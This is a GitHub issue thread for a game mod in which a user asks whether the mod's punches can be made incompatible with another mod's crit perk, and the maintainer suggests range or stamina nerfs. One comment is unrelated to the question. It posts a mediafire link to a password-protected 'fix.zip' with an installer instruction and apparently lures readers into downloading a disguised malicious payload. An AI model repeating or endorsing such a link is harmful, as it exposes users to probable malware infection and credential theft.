### ISSUE TITLE
(Request) Advanced Company Strong Arms

### ISSUE THREAD

**Issue by VanilaBOI** [ThomasNg2/LethalHands#9]
There is perk in Advanced Company called strong arms which makes it possible to crit an enemy, one shoting them.

Sadly this works with squaring up too, which I don't want because I'd like to encourage using the shovel to get this crits.

Is it possible for you to make the two incompatible?

**Comment by Superstar-IT** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ThomasNg2** [comment]
Unsure how I would go about that aside from making my own hit system (which I'm not doing). It could easily be fixed on their side, if the mod is still worked on, by checking if the player is wielding a weapon.
You could also nerf punches by cutting down their range or making them require stamina to discourage people from relying on them too much

**Comment by VanilaBOI** [comment]
I totally figured that it would be something on their side but I thought I'd try my luck.

And yeah I was thinking about reducing the range but totally forget that you added a stamina element.
Very well done mod by the way, love giving my players something to not feel totally helpless.
Really improves the mood of the person who would die anyway to a thumper instead of them just mentally shutting off after getting involved in a chase.
Or to let out some frustration on each other 😅
